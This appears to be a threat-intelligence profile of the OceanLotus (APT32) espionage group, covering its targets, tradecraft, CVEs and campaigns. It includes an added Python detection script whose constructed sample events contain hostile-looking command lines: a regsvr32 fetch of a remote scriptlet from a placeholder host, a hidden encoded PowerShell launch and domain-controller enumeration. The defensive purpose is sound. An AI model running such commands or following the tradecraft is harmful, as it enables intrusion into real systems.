APT32
APT32, most widely known as OceanLotus, is a Vietnam-aligned advanced persistent threat actor assessed in the underlying reporting as operating in support of Vietnamese government interests. Reported aliases include APT-C-00, Bismuth, Canvas Cyclone, Cobalt Kitty, Lotus Bane, Ocean Buffalo, OceanLotus Group, Pond Loach, SeaLotus, SectorF01, and Tin Woodlawn. Reporting describes OceanLotus as active since at least 2012 and engaged in cyber espionage against both domestic and foreign targets. Reported targeting includes Vietnamese human rights activists and dissidents, civil society and media organizations, ASEAN-related entities, foreign governments including Laos and Cambodia, stock investors in Vietnam, Vietnamese public companies, an unnamed Vietnamese infrastructure and transport construction corporation, and businesses in information technology, hospitality, agriculture and commodities, hospitals, retail, automotive, and mobile services. The group has also been reported targeting Chinese entities, including the Wuhan municipal government and China’s Ministry of Emergency Management, and historically companies with business interests in Vietnam.
Recent reporting attributes two campaigns to OceanLotus centered on the SPECTRALVIPER backdoor. One was a supply-chain compromise of FireAnt Metakit from roughly October 2025 to March 2026 that selectively delivered malware to stock investors in Vietnam via the software’s legitimate update mechanism, followed by reconnaissance, HTTP POST staging, DLL side-loading through a rogue DtlCrashCatch.dll, and injection into OneDrive.Sync.Service.exe. The second targeted a Vietnamese construction-sector organization from at least November 2024 to February 2026; ESET suspected initial access via remote code execution vulnerabilities in a public-facing Microsoft SQL Server and observed multiple SPECTRALVIPER variants used for persistence, profiling, lateral movement, and C2 via gatewayrvcenter[.]com. Both campaigns are assessed as suggesting an increased emphasis on domestic espionage.
The actor is described as using a broad mix of custom malware and commodity tooling. Named malware and tools include SPECTRALVIPER, SOUNDBITE, PHOREAL, WINDSHIELD, Cobalt Strike Beacon, NetCat, Mimikatz, and ZiChatBot-related droppers. Execution tradecraft explicitly reported includes heavy PowerShell obfuscation with Invoke-Obfuscation, use of regsvr32 ("Squiblydoo") to download second stages, COM scriptlets to download Cobalt Strike beacons, JavaScript for drive-by downloads and command-and-control, PowerShell one-liners and shellcode loaders, cmd.exe execution, and WMI for remote deployment and Outlook process reconnaissance. Persistence and defense evasion include Registry Run keys, scheduled task XML with backdated timestamps, timestomping to match kernel32.dll creation times, masquerading payloads as Windows updates or Flash installers, and process injection of Cobalt Strike into rundll32.exe. Discovery includes querying the Windows Registry for host information, collecting OS version, computer name, usernames, and IP address information, enumerating domain controllers with net group "Domain Controllers" /domain, and using ping. Exfiltration is reported over an already established C2 channel.
Reporting also documents OceanLotus macOS operations. Reported macOS backdoors were delivered via ZIP archives or malicious Word documents themed for Vietnamese users and used decoy documents, Perl-based or shell-script loaders, LaunchAgent or LaunchDaemon persistence, hidden files, permission changes, timestomping, self-deletion, and encrypted strings and communications. These implants collected host identifiers including serial number, hardware UUID, MAC addresses, processor, memory, OS version, username, computer name, and architecture, and supported commands to download and execute files, run terminal commands, upload and download files, remove files, retrieve configuration, send heartbeat packets, and in one variant receive a delete command.
OceanLotus infrastructure and influence-style operations are also described, including fake news websites and Facebook pages used to profile visitors in Vietnam and across Southeast Asia and occasionally deliver malware designed to log keystrokes. Public reporting links OceanLotus to activity aligned with Vietnamese state interests, and one source notes that Meta linked OceanLotus activity in 2020 to CyberOne Group, also called CyberOne Security, CyberOne Technologies, and Hành Tinh Company Limited, though CyberOne denied the allegation.
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Capital Goods
- Government & Administration
- Independent Media
Where they target
Geographies tied to known operations.
- 🇻🇳 Vietnam
- 🇨🇳 China
Where they're from
Attributed origin per open-source reporting.
- VN
Tradecraft
54 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
29 malware families attributed to this actor across reporting.
Associated vulnerabilities
4 CVEs this actor has used in observed campaigns. 4 of them exploited in the wild.
APT32 has used CVE-2016-7255 to escalate privileges.
...has exploited Office vulnerabilities such as CVE-2017-11882...
This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes, particularly focusing on executions initiated by LNK files. This behavior is associated with the ZDI-CAN-25373 Windows shortcut zero-day vulnerability, where specially crafted LNK files are used to trigger malicious code execution through cmd.exe or powershell.exe. This technique has been actively exploited by multiple APT groups in targeted attacks through both HTTP and SMB delivery methods.
"A critical remote code execution (RCE) vulnerability, identified as CVE-2025-55182 and dubbed React2Shell, exists within the React Server Components (RSC) architecture, allowing unauthenticated attackers to execute arbitrary code..."
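The tradecraft summary above and the LNK detection excerpt describe behaviors that are visible in ordinary process-creation telemetry: explorer.exe spawning cmd.exe or PowerShell, regsvr32 fetching a remote scriptlet via scrobj.dll ("Squiblydoo"), Base64-encoded PowerShell one-liners, and domain controller enumeration with net group "Domain Controllers" /domain. The following is an added example, not code from the page or from any vendor's rule set, expressing those four checks as rules run over a handful of constructed Sysmon-style events; the field names, the sample command lines and the example.invalid hostname are all constructed for illustration.

```python
"""Added example: four process-creation detections over constructed events."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / EDR style; assumed fields)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def explorer_spawns_shell(e: ProcEvent) -> bool:
    # A double-clicked LNK surfaces in telemetry as explorer.exe -> cmd/powershell;
    # the LNK itself is not visible in this event, so expect benign hits too.
    return _basename(e.parent_image) == "explorer.exe" and _basename(e.image) in SHELLS


def regsvr32_remote_scriptlet(e: ProcEvent) -> bool:
    # "Squiblydoo": regsvr32 told to load scrobj.dll with an http(s) scriptlet URL.
    cl = e.command_line.lower()
    return (_basename(e.image) == "regsvr32.exe"
            and "scrobj.dll" in cl
            and re.search(r'/i:\s*"?https?://', cl) is not None)


def encoded_powershell(e: ProcEvent) -> bool:
    # Base64 -enc/-EncodedCommand blobs are the usual footprint of obfuscated one-liners.
    return (re.search(r"(?i)powershell|pwsh", e.command_line) is not None
            and re.search(r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",
                          e.command_line) is not None)


def domain_controller_enumeration(e: ProcEvent) -> bool:
    # net group "Domain Controllers" /domain, as named in the tradecraft summary.
    return (_basename(e.image) == "net.exe"
            and re.search(r'(?i)group\s+"?domain controllers"?\s+/domain', e.command_line) is not None)


RULES = {
    "explorer_spawns_shell": explorer_spawns_shell,
    "regsvr32_remote_scriptlet": regsvr32_remote_scriptlet,
    "encoded_powershell": encoded_powershell,
    "domain_controller_enumeration": domain_controller_enumeration,
}


def evaluate(events):
    """Return (event index, rule name) pairs for every rule each event trips."""
    hits = []
    for i, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                hits.append((i, name))
    return hits


# Constructed sample events; none of this is real telemetry. The Base64 blob
# in event 0 is the UTF-16LE encoding of "ABCDEFGHI", not a real command.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c powershell -nop -w hidden -enc QQBCAEMARABFAEYARwBIAEkA"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 /s /n /u /i:http://cdn.example.invalid/upd.sct scrobj.dll"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              r'net group "Domain Controllers" /domain'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe report.txt"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32 /s "C:\Program Files\Vendor\legit.dll"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Users\alice\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for i, name in evaluate(SAMPLE_EVENTS):
        print(f"event {i}: {name} -> {SAMPLE_EVENTS[i].command_line}")
```

Run stand-alone it flags events 0, 1, 2 and 5 and leaves the benign notepad and local-DLL regsvr32 events alone. Event 5 (explorer launching a plain script) shows why the explorer-to-shell rule from the detection excerpt is a triage signal rather than an alert on its own; in practice it is combined with the encoded-command or remote-scriptlet rules, or with the parent's LNK origin when the sensor records it.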
Observables
282 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
Conducted cyber espionage campaigns targeting domestic Vietnamese entities and stock investors, including a supply chain attack via FireAnt Metakit and a prolonged intrusion into a Vietnamese infrastructure and transport construction corporation. The group is described as shifting toward domestic espionage while maintaining a history of targeting China and Vietnamese civil society, media, and dissidents.
Linked by code similarity to the ZiChatBot dropper and described as expanding beyond its traditional Asia-Pacific focus into the Middle East and a global PyPI supply chain attack targeting developers via malicious Python packages.
A Vietnam-aligned threat actor suspected in this PyPI supply chain campaign. The group has used phishing as an initial infection method and has also explored supply chain attacks, including poisoned Visual Studio Code projects masquerading as Cobalt Strike plugins and infrastructure abuse via public services such as Notion.
Listed in the detection annotations as a threat actor associated with exploitation for privilege escalation.